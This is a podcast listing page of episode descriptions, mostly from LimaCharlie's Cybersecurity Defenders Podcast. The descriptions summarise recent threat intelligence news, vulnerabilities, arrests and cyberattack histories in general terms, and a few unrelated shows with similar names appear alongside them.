Podcasts about limacharlie

In this episode of The Cybersecurity Defenders Podcast, we discuss some cutting-edge intel coming out of LimaCharlie's community.Japanese law enforcement has publicly linked a Chinese state-sponsored threat group known as MirrorFace to a series of cyberattacks that have targeted Japan over the past five years.Researchers at Cyfirma have detailed a new campaign where attackers are using a Remote Access Trojan (RAT) dubbed Neptune to hijack Windows systems.Researchers have discovered new variants of a previously identified Linux backdoor known as SparrowDoor, believed to be the work of a North Korean state-sponsored group known as Kimsuky.CISA has added a recently disclosed vulnerability in CrushFTP (tracked as CVE-2024-4040) to its Known Exploited Vulnerabilities (KEV) catalog.

In this episode of The Cybersecurity Defenders Podcast, we discuss some cutting-edge intel coming out of LimaCharlie's community.On March 24, The Atlantic's editor-in-chief Jeffrey Goldberg reported a significant OPSEC failure involving U.S. Secretary of Defense Pete Hegseth, who allegedly sent him detailed U.S. military plans over Signal—an encrypted messaging app—on March 15.A newly discovered supply chain attack on the npm ecosystem is targeting developers by backdooring local packages through a process known as “manifest confusion.” Unit 42 researchers at Palo Alto Networks have uncovered an ongoing software supply chain attack targeting GitHub repositories via malicious GitHub Actions workflows.

LC - Lima Charlie Loud and Clear Welcome to The Stew and The Nunn presents, Lima Charlie. For those not versed in military phonetic alphabet, Lima Charlie means Loud and Clear The purpose of this series is to spotlight the GWOT era with GWOT veterans telling their stories. Our guest this week is KJ.

Shaun McCutcheon and Dan Backer - EXCLUSIVE: Conservative Group Seeks DOJ, FEC Probes of Jasmine Crockett

In this episode of The Cybersecurity Defenders Podcast, we discuss some cutting-edge intel coming out of LimaCharlie's community Slack channel.Google has announced a $32 billion ALL CASH acquisition of the Israeli cybersecurity startup Wiz, making it one of the largest deals in the company's history.A newly discovered zero-day vulnerability in Windows allows attackers to escalate privileges, potentially granting them full control over affected systems.Security researchers have identified new intrusion techniques used by the SocGholish malware framework, which is increasingly being leveraged to distribute ransomware.Security researchers have uncovered a new technique that allows attackers to disable Endpoint Detection and Response (EDR) solutions using Windows Defender Application Control (WDAC).Security researchers have discovered undocumented commands in a widely used Bluetooth chip, potentially exposing over a billion devices to security risks.

In this episode of The Cybersecurity Defenders Podcast, we discuss some cutting-edge intel coming out of the LimaCharlie community.The Cybersecurity and Infrastructure Security Agency (CISA) is facing significant operational challenges as budget constraints force it to scale back key cybersecurity programs.Scammers are taking a new approach to extortion by mailing physical ransom letters to victims, claiming to be the operators of the BianLian ransomware group.A newly identified advanced persistent threat (APT) group, dubbed "Crafty Camel," has been targeting aviation operational technology (OT) systems using a sophisticated technique involving polyglot files. A new malvertising campaign is leveraging deceptive online ads to distribute information-stealing malware hosted on GitHub, highlighting an ongoing evolution in cybercriminal tactics.Security researchers have disclosed details of multiple vulnerabilities in Supervisory Control and Data Acquisition (SCADA) systems that could be exploited to facilitate attacks on industrial environments.

In this episode of The Cybersecurity Defenders Podcast, we discuss some cutting-edge intel coming out of LimaCharlie's community Slack channel.North Korea's state-backed Lazarus Group is believed to be responsible for the largest cryptocurrency heist ever recorded, stealing $1.5 billion from the Bybit exchange. The "BadPilot" hacking campaign has been linked to Russia's Sandworm threat group, a unit of the GRU known for cyber espionage and disruptive attacks. GreyNoise has observed active exploitation of CVE-2025-0108, a critical authentication bypass vulnerability in Palo Alto Networks' PAN-OS. Security researcher Paul Butler has demonstrated a novel technique for smuggling arbitrary data using emojis, leveraging the way modern text encoding and rendering systems handle Unicode characters.Kitty Stealer is a newly identified malware targeting macOS systems, designed to steal sensitive user data such as credentials, browser cookies, and cryptocurrency wallets.SEKOIA researchers have uncovered a previously unknown IoT botnet named PolarEdge, which has been operating covertly for an extended period.

In this episode of The Cybersecurity Defenders Podcast, we discuss some cutting-edge intel coming out of LimaCharlie's community Slack channel.Network traffic tunneling is a technique used by attackers to bypass security controls and exfiltrate data or establish covert communication channels. Threat actors use various tunneling methods, including DNS tunneling, HTTP/S tunneling, and ICMP tunneling, each with its own advantages depending on the target environment.The "BadPilot" hacking campaign has been linked to Russia's Sandworm threat group, a unit of the GRU known for cyber espionage and disruptive attacks.GreyNoise has observed active exploitation of CVE-2025-0108, a critical authentication bypass vulnerability in Palo Alto Networks' PAN-OS. This vulnerability allows unauthenticated attackers to gain administrative access to affected firewall devices, posing a significant risk to organizations relying on PAN-OS for network security.Security researcher Paul Butler has demonstrated a novel technique for smuggling arbitrary data using emojis, leveraging the way modern text encoding and rendering systems handle Unicode characters.Kitty Stealer is a newly identified malware targeting macOS systems, designed to steal sensitive user data such as credentials, browser cookies, and cryptocurrency wallets.

In this episode of The Cybersecurity Defenders Podcast, we discuss some cutting-edge intel coming out of LimaCharlie's community Slack channel.Ransomware payments saw a significant drop in 2024, falling by 35% compared to the previous year. Law enforcement agencies have arrested a suspected core member of the 8Base ransomware group, marking a significant development in efforts to combat cybercrime. The XE Group, a financially motivated cybercrime organization, has shifted its tactics from traditional card-skimming attacks to more sophisticated supply chain compromises.Security researchers at watchTowr have demonstrated a supply chain attack technique that surpasses the scale and stealth of the infamous SolarWinds breach.A newly discovered cyber-espionage campaign is targeting government and military entities in South Asia, according to researchers at Unit 42.

In this episode of The Cybersecurity Defenders Podcast, we discuss some cutting-edge intel coming out of LimaCharlie's community Slack channel.Lumma Stealer, an information-stealing malware, has been observed using new evasion techniques to avoid detection.Researchers at CloudSEK have uncovered a trojanized version of the xWorm Remote Access Trojan (RAT) builder that is being secretly distributed among cybercriminals. A recent disclosure by security researcher Zach Latta highlights how the Washington State Department of Transportation (WSDOT) inadvertently exposed sensitive server credentials on its public website.A critical authentication bypass vulnerability (CVE-2024-21762) in Fortinet's FortiOS has been actively exploited in the wild, allowing attackers to execute arbitrary code or gain unauthorized access to affected systems.

In this episode of The Cybersecurity Defenders Podcast, we discuss some cutting-edge intel coming out of LimaCharlie's community Slack channel.From earlier this week, The Docker Systems Status page reports an ongoing issue affecting Docker Desktop on macOS, where malware alerts are triggered by macOS identifying com.docker.vmnetd or com.docker.socket as potential threats. SafeBreach Labs has released a proof-of-concept (PoC) exploit for CVE-2024-49113, a critical vulnerability in the Lightweight Directory Access Protocol (LDAP) that impacts unpatched Windows Servers, including Active Directory Domain Controllers (DCs).The Halcyon RISE team has uncovered a novel ransomware campaign targeting Amazon S3 buckets, exploiting AWS's Server-Side Encryption with Customer-Provided Keys (SSE-C).A recent campaign has been targeting Fortinet FortiGate firewalls with exposed management interfaces, likely exploiting a zero-day vulnerability to gain unauthorized administrative access. Sophos recently reported on two distinct ransomware campaigns utilizing unique techniques to pressure victims and evade detection.

In this episode of The Cybersecurity Defenders Podcast, we discuss some cutting-edge intel coming out of LimaCharlie's community Slack channel.We pause to honor the life and legacy of Amit Yoran, a visionary leader in the world of cybersecurity who passed away on January 4, 2025, after battling cancer.In April 2024, a threat actor known as "USDoD" advertised a massive database for sale on BreachForums, claiming it contained 2.9 billion records encompassing personal information of individuals from the United States, United Kingdom, and Canada. In December 2024, the U.S. Treasury Department disclosed a significant cybersecurity breach attributed to Chinese state-sponsored hackers. SafeBreach Labs has published a proof-of-concept (PoC) exploit for CVE-2024-49113, dubbed "LDAPNightmare." This vulnerability affects Windows Servers using the Lightweight Directory Access Protocol (LDAP) and enables attackers to crash unpatched systems.

On this episode of The Cybersecurity Defenders Podcast, we share both parts of 'When the Lights Went Out in Ukraine.'Beginning on January 13th, 2022, a Russian APT installed wiper malware on the IT networks of government, NGO, and IT companies across Ukraine. The malicious program was designed to appear like ransomware, but contained no recovery feature – it simply destroyed any computer it wished. Just one day later, hackers from the intelligence service of Belarus – Russia's close ally – took down 70 websites belonging to the Ukrainian government. This was tilling – laying down the foundation for an all-out ground attack. Plastered on the 70 downed websites was a message from the attackers: “be afraid,” they wrote, and expect the worst.”This episode was written by the talented Nathaniel Nelson, narrated by Christopher Luft, and produced by the team at LimaCharlie.And a special thank you to Robert Lipovsky for sharing his first-hand knowledge.

This episode of the Cybersecurity Defenders podcast is a two-part mini-series about the greatest cyber attack ever conceived: Stuxnet. Joining to help us tell the story is Kim Zetter, Journalist and Author - Countdown to Zero Day: Stuxnet and the Launch of the World's First Digital Weapon. Stuxnet is a malicious computer worm first uncovered in 2010 and thought to have been in development since at least 2005. Stuxnet targets supervisory control and data acquisition (SCADA) systems and is believed to be responsible for causing substantial damage to the nuclear program of Iran. Although neither country has openly admitted responsibility, the worm is widely understood to be a cyberweapon built jointly by the United States and Israel in a collaborative effort known as Operation Olympic Games. The program, started during the Bush administration, was rapidly expanded within the first months of Barack Obama's presidency. This episode was written by Nathaniel Nelson, narrated by Christopher Luft, and produced by the team at LimaCharlie.

In this episode of the Cybersecurity Defenders podcast, we recount some hacker history and tell the story of Shawn Carpenter; a rogue cybersecurity defender who singlehandedly identified a Chinese APT. It is a phenomenal story that exemplifies the grit and moral fortitude that the best defenders among us have. Titan Rain was a series of coordinated attacks on computer systems in the United States since 2003; they were known to have been ongoing for at least three years. The attacks originated in Guangdong, China. The activity is believed to be associated with a state-sponsored advanced persistent threat. It was given the designation Titan Rain by the federal government of the United States.Titan Rain hackers gained access to many United States defense contractor computer networks, which were targeted for their sensitive information, including those at Lockheed Martin, Sandia National Laboratories, Redstone Arsenal, and NASA. This episode was written by Nathaniel Nelson, narrated by Christopher Luft and produced by the team at LimaCharlie.

In this episode, we recount the story of Operation Flyhook - an FBI sting operation in 2000 that resulted in the arrest of two Russian hackers on American soil. It is quite the story and leaves us with some pretty heavy conclusions. This episode was written by Nathaniel Nelson, narrated by Christopher Luft, and produced by the team at LimaCharlie. Any questions or feedback can be directed to defenders@limacharlie.io

In this episode of The Cybersecurity Defenders Podcast, we discuss some cutting-edge intel coming out of LimaCharlie's community Slack channel.ptcpdump is an eBPF-based version of tcpdump that adds process information to each packet. It supports filtering by process ID, process name, container ID, and Kubernetes pod name. In a recent implementation, Target's cybersecurity team adopted TLSH (Trend Micro Locality Sensitive Hash) to improve their malware detection capabilities. Huntress recently issued a threat advisory regarding active exploitation of a zero-day vulnerability affecting Cleo's file transfer software, specifically impacting LexiCom, VLTrader, and Harmony versions up to 5.8.0.21. Sublime Security recently analyzed a phishing campaign that impersonates Microsoft SharePoint to deliver the XLoader malware.Palo Alto Networks' Unit 42 team has uncovered a new packer-as-a-service (PaaS) operation named HeartCrypt, which has been active since July 2023 and began sales in February 2024. HeartCrypt is designed to obfuscate malware, making detection by security solutions more challenging.

In this episode of The Cybersecurity Defenders Podcast, we discuss some cutting-edge intel coming out of LimaCharlie's community Slack channel.Datadog Security Labs has introduced the Supply-Chain Firewall, a new open-source tool designed to protect developers from malicious and vulnerable packages sourced from PyPI and npm repositories.U.S. authorities have arrested 19-year-old Remington Goy Ogletree, known online as "remi," for allegedly breaching a U.S. financial institution and two unnamed telecommunications firms. A recent study titled "A Study of Malware Prevention in Linux Distributions" examines the challenges of preventing and detecting malware within Linux distribution package repositories. A recently identified zero-day vulnerability affects all modern versions of Windows Workstation and Server operating systems, from Windows 7 and Server 2008 R2 up to the latest Windows 11 v24H2 and Server 2022. And you can subscribe to Detection Engineering Weekly here.

In this episode of The Cybersecurity Defenders Podcast, we discuss some cutting-edge intel coming out of LimaCharlie's community Slack channel.Russian courts have sentenced Stanislav Moiseyev, the leader of the Hydra dark web marketplace, to life imprisonment.The U.S. Commerce Department has expanded its export controls, adding nearly 140 Chinese technology companies to its "entity list." This action primarily targets firms involved in the production of computer chips, chipmaking tools, and related software, including Chinese-owned entities operating in Japan, South Korea, and Singapore.Researchers have uncovered new malware strains, RevC2 and Venom Loader, tied to the sophisticated threat actor known as Venom Spider. Recent analyses have identified a critical vulnerability in generative AI systems, termed "flowbreaking" exploits, which can lead to unintended data leaks.

In this episode of The Cybersecurity Defenders Podcast, we discuss some cutting-edge intel coming out of LimaCharlie's community Slack channel.In recent months, cybersecurity researchers have observed a surge in the use of a social engineering technique known as "ClickFix." This method involves threat actors presenting users with deceptive error messages that prompt them to manually execute malicious commands, often by copying and pasting scripts into their systems.Raspberry Robin, also known as Roshtyak, is a highly obfuscated malware first discovered in 2021, notable for its complex binary structure and advanced evasion techniques. It primarily spreads via infected USB devices and employs multi-layered execution to obscure its true purpose. A China-linked Advanced Persistent Threat (APT) group, Gelsemium, has been observed targeting Linux systems for the first time, deploying previously undocumented malware in an espionage campaign. Historically known for targeting Windows platforms, this new activity signifies a shift towards Linux, possibly driven by the increasing security of Windows systems.Russia's APT28 hacking group, also known as Fancy Bear or Unit 26165, has developed a novel technique dubbed the “nearest neighbor attack” to exploit Wi-Fi networks remotely.Hackers linked to the Chinese government, known as Salt Typhoon, have deeply infiltrated U.S. telecommunications infrastructure, gaining the ability to intercept unencrypted phone calls and text messages. The group exploited vulnerabilities in the wiretap systems used by U.S. authorities for lawful interception, marking what Senator Mark Warner has called "the worst telecom hack in our nation's history."

In this episode of The Cybersecurity Defenders Podcast, we discuss some cutting-edge intel coming out of LimaCharlie's community Slack channel.U.S. authorities have identified and charged individuals responsible for a significant data breach involving Snowflake Inc., a major cloud data warehousing company. The breach resulted in the theft of approximately 50 billion records from AT&T, one of Snowflake's prominent clients.U.S. prosecutors have charged five individuals, including 22-year-old Scottish national Tyler Buchanan, for their alleged involvement in the cybercrime group Scattered Spider. This group is accused of executing sophisticated phishing attacks that compromised numerous U.S. companies and individuals, leading to the theft of confidential information and cryptocurrency. The next one is an interesting breakdown on the evolving landscape of Chinese state-sponsored cyber threats that reveals a highly coordinated and multi-layered approach to achieving the strategic objectives of the Chinese Communist Party (CCP).In July 2024, cybersecurity researchers identified a new variant of the Melofee backdoor, a sophisticated malware associated with the Winnti Advanced Persistent Threat group. This variant specifically targets Red Hat Enterprise Linux 7.9 systems and demonstrates enhanced stealth and persistence mechanisms. In early October 2024, cybersecurity analysts identified a phishing campaign targeting e-commerce shoppers in Europe and the USA seeking Black Friday discounts. The campaign, attributed to a financially motivated Chinese threat actor dubbed "SilkSpecter," exploited the surge in online shopping during November's Black Friday season. Palo Alto Networks' Unit 42 has identified exploitation activities targeting two critical vulnerabilities in PAN-OS software: CVE-2024-0012 and CVE-2024-9474.

In this episode of The Cybersecurity Defenders Podcast, we discuss some cutting-edge intel coming out of LimaCharlie's community Slack channel.MFASweep is a PowerShell script that attempts to log in to various Microsoft services using a provided set of credentials and will attempt to identify if MFA is enabled. CVE2CAPEC is a tool developed by Galeax that automates the process of mapping Common Vulnerabilities and Exposures (CVEs) to Common Weakness Enumerations (CWEs), Common Attack Pattern Enumeration and Classification (CAPEC), and MITRE ATT&CK Techniques.This tool helps security researchers identify vulnerabilities within macOS's sandbox restrictions, particularly targeting XPC services in the PID domain marked as "Application" services, which often lack adequate protection.Zscaler's recent blog discusses how North Korean IT professionals are increasingly finding remote work in Western companies, often under disguised identities.In a recent campaign, GootLoader malware has been targeting Bengal cat enthusiasts in Australia using SEO poisoning tactics.After a multi-month absence, the malware loader FakeBat—also known as Eugenloader or PaykLoader—has resurfaced, distributing malware through Google Ads, with a recent campaign exploiting ads for the popular app Notion.Over the past five years, Sophos has been engaged in a complex battle against Chinese state-sponsored cyber adversaries targeting its firewall products. This prolonged engagement, detailed in Sophos' "Pacific Rim" report, reveals a series of sophisticated attacks aimed at exploiting vulnerabilities in internet-facing devices, particularly those within critical infrastructure sectors across South and Southeast Asia.

In this episode of The Cybersecurity Defenders Podcast, we discuss some cutting-edge intel coming out of LimaCharlie's community Slack channel.VMRay's analysis on Latrodectus highlights the malware family's development, detailing how it evolved from simple loaders to highly evasive, sophisticated malware.The WarmCookie malware is a recent, persistent threat known for its self-updating capabilities, specifically designed to evade security tools and establish long-term presence in systems. Fortinet recently disclosed a critical zero-day vulnerability in its FortiManager product, assigned CVE-2024-47575, which has been actively exploited in the wild.The European Union (EU) recently updated its product liability framework to better address the challenges of the digital age and support the shift toward a circular economy. Linux creator Linus Torvalds recently reaffirmed the expulsion of Russian maintainers from the Linux MAINTAINERS file due to sanctions compliance, sparking discussion within the open-source community.

In this episode of The Cybersecurity Defenders Podcast, we discuss some cutting-edge intel coming out of LimaCharlie's community Slack channel.Microsoft has recently confirmed that a software bug caused the loss of more than two weeks' worth of critical security logs from several of its cloud services.Brazil's Federal Police have arrested a hacker suspected to be "USDoD," a notorious cybercriminal involved in several high-profile data breaches.A critical vulnerability has been discovered in SolarWinds' Web Help Desk (WHD) software, involving hardcoded credentials that could be exploited by attackers. The U.S. Cybersecurity and Infrastructure Security Agency (CISA) has added several critical vulnerabilities to its Known Exploited Vulnerabilities (KEV) catalog, signaling that these flaws are being actively used in cyberattacks.

In this episode of The Cybersecurity Defenders Podcast, we discuss some cutting-edge intel coming out of LimaCharlie's community Slack channel.A recent malware campaign has been discovered that exploits the open-source Wazuh SIEM agent to deliver a cryptomining payload. There is uncertainty surrounding the .io domain following the UK's decision to return the Chagos Islands, including the British Indian Ocean Territory, to Mauritius.The October 2024 report, "Influence and Cyber Operations," explores how AI is being leveraged by both state and non-state actors in cyber campaigns. Key findings show that AI tools are increasingly being used to enhance traditional cyberattacks, particularly in areas like vulnerability research, malware debugging, and influence operations. Discord has recently been blocked in both Russia and Turkey due to claims of illegal activity on the platform.Palo Alto Networks recently patched several critical vulnerabilities in its Expedition tool, which could allow attackers to take control of firewall systems. The most severe flaw, CVE-2024-9463, allows unauthenticated attackers to execute arbitrary OS commands as root, exposing sensitive data like usernames, passwords, and API keys.The article from ESET highlights a cyberespionage campaign conducted by a group known as GoldenJackal, which is targeting government and diplomatic entities, focusing specifically on air-gapped systems in regions such as Europe, the Middle East, and South Asia.

In this episode of The Cybersecurity Defenders Podcast, we discuss some cutting-edge intel coming out of LimaCharlie's community Slack channel.Silent Push's recent analysis reveals new tactics by the FIN7 cybercriminal group, which is leveraging AI-based “DeepNude Generators” as part of a phishing campaign to spread malware. Microsoft's Digital Crimes Unit (DCU), in partnership with the U.S. Department of Justice, has taken steps to dismantle cyber operations by Star Blizzard, a Russian state-affiliated actor also known as COLDRIVER.Aqua Security's detailed research on perfctl describes it as a highly stealthy malware that targets Linux servers using a range of sophisticated methods.Comcast recently disclosed that over 237,000 customers had their personal data compromised due to a ransomware attack targeting a former debt collection agency, Financial Business and Consumer Solutions (FBCS).TrustedSec's research on EKUwu sheds light on a significant Active Directory Certificate Services (AD CS) vulnerability that allows attackers to misuse version 1 certificate templates. Stats on business outcomes after breaches referenced by Matt.

In this episode of The Cybersecurity Defenders Podcast, we discuss some cutting-edge intel coming out of LimaCharlie's community Slack channel.The White House recently hosted the International Counter Ransomware Initiative (CRI) summit, bringing together representatives from 68 countries to address the growing global threat of ransomware.The rise of "Shadow AI," which refers to the unauthorized use of AI tools by employees without the oversight of IT departments, poses significant risks for organizations. A new wave of attacks leveraging the More_Eggs backdoor malware has been specifically targeting recruiters. TA4557, a financially motivated group linked to North Korea, has been distributing this backdoor since late 2023.The Andariel hacking group, a subgroup of North Korea's Lazarus Group, has turned its attention to financially motivated attacks against U.S. organizations.Forescout Vedere Labs has uncovered 14 vulnerabilities affecting over 700,000 DrayTek routers, with two critical flaws posing significant security risks.

In this episode of The Cybersecurity Defenders Podcast, we discuss some cutting-edge intel coming out of LimaCharlie's community Slack channel.Apple's release of macOS 15, or Sequoia, has caused significant disruptions for several security tools and software vendors, including CrowdStrike, SentinelOne, Microsoft, and others.Attackers are exploiting GitHub notifications for phishing by sending legitimate-looking alerts with malicious URLs.Truffle Security's research exposes a significant issue in GitHub's handling of deleted and private repository data via Cross Fork Object Reference (CFOR).AhnLab's report details Supershell, a malware targeting Linux SSH servers via brute-force attacks.Since 2022, Mandiant has tracked DPRK IT workers infiltrating global organizations by posing as non-North Koreans to fund the regime's weapons programs and evade sanctions.In August 2024, Telegram CEO Pavel Durov was arrested in France, facing charges for allowing criminal activities to proliferate on the platform, including the distribution of illegal content such as child sexual abuse material.

In this episode of The Cybersecurity Defenders Podcast, we discuss some cutting-edge intel coming out of LimaCharlie's community Slack channel.Fortinet responded by confirming that the breach involved unauthorized access to files on a third-party cloud-based shared drive, affecting a small portion of customer data.Hackers are targeting Oracle WebLogic servers with a new Linux malware named "Hadooken," which is designed to deploy a cryptominer and facilitate distributed denial-of-service (DDoS) attacks. Microsoft has reclassified a previously patched bug, CVE-2024-43461, as a zero-day vulnerability actively exploited by the "Void Banshee" threat group.Security researchers from Tenable revealed a critical remote code execution vulnerability in Google Cloud Platform that could have allowed attackers to run malicious code on millions of Google's servers.

In this episode of The Cybersecurity Defenders Podcast, we discuss some cutting-edge intel coming out of LimaCharlie's community Slack channel.The Specula C2 framework represents a sophisticated attack method that transforms Microsoft Outlook into a command-and-control system by exploiting its Home Page feature. Attackers exploit browser notifications in Chromium-based browsers by tricking users through CAPTCHA-like prompts to enable notifications.The Biden administration has launched an initiative aimed at addressing the growing cybersecurity talent shortage, which has reached critical levels. Mustang Panda, a Chinese state-backed cyber-espionage group, has adapted its tactics by launching a USB-based attack campaign that leverages a worm for self-propagation across air-gapped networks.

On this episode of The Cybersecurity Defenders Podcast, we unpack the hacker mindset with Ken Westin, Senior Solutions Engineer at LimaCharlie.Ken is a seasoned thought leader in cybersecurity who has spent years analyzing and understanding the intricacies of cyber threats and the methods behind them. Ken has a unique ability to identify emerging trends in the industry and for figuring out how businesses can protect themselves before they fall victim to attacks. Previous to his current role, Ken was the Field CISO at Panther, where he developed workshops and delivered them around the world. His career also includes significant contributions at Cybereason, Elastic, and Splunk, where he drove security growth, developed innovative tools, and shaped industry conversations on cybersecurity. Ken has been a key spokesperson in the industry, frequently quoted in the media and featured at major conferences like Black Hat and DEF CON.Ken recently joined the team at LimaCharlie as a Senior Solutions Engineer, with the intent to use his deep expertise to help organizations build robust security strategies.Ken's reading list:“Daemon” - Daniel Suarez“Cryptonomicon” - Neal Stephenson“The Myth of Normal” - Gabor Maté“Threats: What Every Engineer Should Learn From Star Wars” - Adam Shostack“The Mitrokhin Archive” Christopher Andrew & Vasili Mitrokhin“The Road” - Cormac McCarthyThe song at the end of the podcast:Decrypted Savant - Mercator Misconceptions

In this episode of The Cybersecurity Defenders Podcast, we discuss some cutting-edge intel coming out of LimaCharlie's community Slack channel.A stealthy Linux malware named 'sedexp' has been evading detection since 2022 by using a persistence technique not yet included in the MITRE ATT&CK framework.The Black Lotus Labs team at Lumen Technologies have uncovered a group of hackers linked to the Chinese government which have exploited a previously unknown software vulnerability to target U.S. internet service providers.Earlier in August, a North Korean hacking group exploited a previously unknown bug in Chrome-based browsers, aiming to steal cryptocurrency, which was reported by Microsoft in a recent update.The Dutch Data Protection Authority, or Dutch DPA, has hit Clearview AI with a €30.5 million fine—about $33.7 million—for illegally collecting data using facial recognition, including photos of Dutch citizens.Energy giant Halliburton has confirmed that its systems were hacked, and intruders were able to steal information following a cyberattack last week.

In this episode of The Cybersecurity Defenders Podcast, we discuss some cutting-edge intel coming out of LimaCharlie's community Slack channel.Starting in October, all Microsoft Azure customers will be required to have multi-factor authentication (MFA) enabled on their accounts.Documents from a lawsuit revealed that over 2.9 billion records are vulnerable after a massive hack of the Florida-based National Public Data network.Microsoft recently advised of a critical TCP/IP Remote Code Execution Vulnerability dubbed CVE 2024-38063, which is a critical unauthenticated Remote Code Execution - or RCE - vulnerability within the Windows TCP/IP stack. Ransomware victims have paid $459,800,000 to cybercriminals in the first half of 2024, setting the stage for a new record this year if ransom payments continue at this level.

In this episode, Michael Glenn and Colin Fowler speak with Maxime Lamothe-Brassard of LimaCharlie about cybersecurity as a buildable cloud service. Maxime discusses a thoughtful approach to product development that puts cloud service structure into context in terms of both market forces and the historical development of cybersecurity products.“But the fundamental truth behind it is, all of this is just stuff made up by humans to make a system work. And if you read about it and you go and you try to understand it, you can step through it and you can do it.” - Maxime Lamothe-Brassard, Founder & CEO of LimaCharlie

In this episode of The Cybersecurity Defenders Podcast, we discuss some cutting-edge intel coming out of LimaCharlie's community Slack channel.A heated dispute at DEF CON over the custom electronic badges this year turned physical, leading to an altercation between two attendees.The U.S. Department of Justice has charged Matthew Isaac Knoot, a 38-year-old Nashville resident, with multiple crimes for aiding North Korean IT workers in securing jobs with U.S. and U.K. companies.The FBI has dismantled the infrastructure of the Dispossessor ransomware group, also known as Radar, which had rapidly gained prominence since its inception in August 2023.A critical flaw in Proofpoint's email filtering service was recently discovered, allowing cybercriminals to impersonate major brands and send phishing emails that bypassed Proofpoint's security.A newly discovered security flaw affects AMD processors dating back to 2006. The vulnerability, which impacts CPUs from the Athlon 64 to the Ryzen 7000 series, allows attackers to exploit speculative execution to access sensitive data.

In this episode of The Cybersecurity Defenders Podcast, we discuss some cutting-edge intel coming out of LimaCharlie's community Slack channel.The Chinese hacker group GhostEmperor has re-emerged after a two-year hiatus, displaying new advanced capabilities and sophisticated evasion techniques. The Chinese company, Jiangsu Bangning Science & Technology Co., in charge of handing out domain names ending in “.top” has been given until mid-August 2024 to show that it has put in place systems for managing phishing reports and suspending abusive domains, or else forfeit its license to sell domains. Following a report by the cybersecurity firm Sekoia.io, the Paris Public Prosecutor's Office launched a preliminary investigation into a botnet involving millions of global victims, including thousands of machines in France. Microsoft has initiated significant changes to its Windows operating system following a critical incident involving CrowdStrike's kernel driver.

In this episode of The Cybersecurity Defenders Podcast, we discuss some cutting-edge intel coming out of LimaCharlie's community Slack channel.Blast-RADIUS is a vulnerability in the RADIUS protocol that allows a man-in-the-middle attacker to forge valid protocol accept messages in response to failed authentication requests.The blog post on Syntax-Err0r details a technique for silently installing a Chrome extension to maintain persistence, bypassing typical detection methods.American telecom service provider AT&T has confirmed that threat actors managed to access data belonging to "nearly all" of its wireless customers as well as customers of mobile virtual network operators using AT&T's wireless network.The U.S. Department of Commerce added Kaspersky to its Entity List, barring U.S. businesses from engaging with the company due to national security concerns related to the Russian government's influence over Kaspersky's operations.On July 19th Crowdstrike distributed a faulty update to its Falcon sensors that caused widespread problems with computers running Microsoft Windows. As a result, roughly 8.5 million systems crashed, bringing up the feared blue screen of death, in what is being called the largest IT outage in history (+outage 1-month ago, +outage 3-months ago).

In this episode of The Cybersecurity Defenders Podcast, we discuss some cutting-edge intel coming out of LimaCharlie's community Slack channel.Likely the biggest password leak ever: nearly 10 billion credentials exposed.Eldorado is a newly discovered ransomware-as-a-service operation targeting both Windows and Linux systems. OVHcloud has reported mitigating a record-breaking distributed denial-of-service attack that peaked at 840 million packets per second.Cisco has issued a warning about a critical remote code execution vulnerability named "regreSSHion," tracked as CVE-2024-6387, affecting OpenSSH on glibc-based Linux systems. In the first half of 2024, cryptocurrency thefts amounted to $1.4 billion, significantly driven by rising crypto prices and a few large-scale attacks.

In this episode of The Cybersecurity Defenders Podcast, we discuss some cutting-edge intel coming out of LimaCharlie's community Slack channel.A high-severity security vulnerability in Progress Software's MOVEit Transfer software could allow cyberattackers to get around the platform's authentication mechanisms — and it's been spotted being actively exploited in the wild just hours after it was made public.A new version of the P2P worm, P2PInfect, that targets Redis servers running on both Linux and Windows systems, which is aimed at deploying both ransomware and cryptocurrency mining payloads, is out in the wild.The polyfill.io domain, used for providing backward compatibility for older browsers, has been shut down amid accusations of malicious activity after recently being acquired by Chinese firm Funnull, and was allegedly redirecting users to malicious sites and employing evasion techniques. The Germany-based company behind the world-famous remote desktop software TeamViewer has confirmed that in 2016 TeamViewer software was compromised.

In this episode of The Cybersecurity Defenders Podcast, we discuss some cutting-edge intel coming out of LimaCharlie's community Slack channel.SigmaHQ has introduced Sigma Correlations to enhance its rule-based detection capabilities, allowing for more sophisticated event correlation across multiple Sigma rules.Tyler Buchanan, a 22-year-old from the UK and alleged leader of the Scattered Spider hacking group, was arrested in Spain.Microsoft has issued an urgent update for all supported versions of Windows to address a critical Wi-Fi vulnerability, CVE-2024-30078.Three individuals— Yousef Selassie, Ugochukwu Emmanuel Nwosu, and David Gil—have been charged with operating Empire Market, a dark web marketplace that facilitated over $430 million in illegal transactions.In September 2022, Mandiant began investigating several intrusions conducted by UNC3886, a China-linked cyber espionage group, after discovering malware in ESXi hypervisors.

In this episode of The Cybersecurity Defenders Podcast, we discuss some cutting-edge intel coming out of LimaCharlie's community Slack channel.Mandiant has linked a series of data breaches affecting hundreds of Snowflake instances to the use of infostealer malware, primarily targeting non-Snowflake systems to harvest credentials.Authorities have ramped up something they are calling Operation Endgame which is an effort to capture a fellow that goes by the handle "Odd," the alleged mastermind behind the Emotet botnet.McAfee has identified a fake Bahrain government Android app masquerading as the Labour Market Regulatory Authority app, and is designed to steal personal data for financial fraud.A technical deep-dive on Operation Crimson Palace performed by Sophos X-ops: the operation exposes a sophisticated cyberespionage campaign targeting a Southeast Asian government, attributed to Chinese state interests.

In this episode of The Cybersecurity Defenders Podcast, we discuss some cutting-edge intel coming out of LimaCharlie's community Slack channel.Researchers have identified a new malware, called"GhostEngine," which targets vulnerable drivers to disable endpoint detection and response solutions. MITRE has released some more details on how Chinese state-sponsored hackers recently exploited VMware systems within MITRE's NERVE environment for persistence and evasion.The FBI has once again seized control of BreachForums, a notorious site known for trading stolen data, marking the second such action within a year.Information on MSSN CTRL, the security automation and engineering conference, can be found here.

